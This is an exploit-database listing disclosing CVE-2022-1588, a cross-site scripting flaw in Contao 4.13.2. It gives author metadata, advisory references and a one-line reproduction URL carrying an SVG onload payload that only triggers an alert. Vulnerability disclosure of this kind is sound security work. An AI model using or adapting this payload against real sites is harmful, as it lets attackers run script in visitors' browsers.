Headline
Contao 4.13.2 Cross Site Scripting
Contao version 4.13.2 suffers from a cross site scripting vulnerability.
# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)# Google Dork: NA# Date: 04/28/2022# Exploit Author: Chetanya Sharma @AggressiveUser# Vendor Homepage: https://contao.org/en/# Software Link: https://github.com/contao/contao/releases/tag/4.13.2# Version: [ 4.13.2 ] # Tested on: [KALI OS]# CVE : CVE-2022-1588# References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html---------------Steps to reproduce:Navigate to the below URLURL: https://localhost/contao/"><svg//onload=alert(112233)>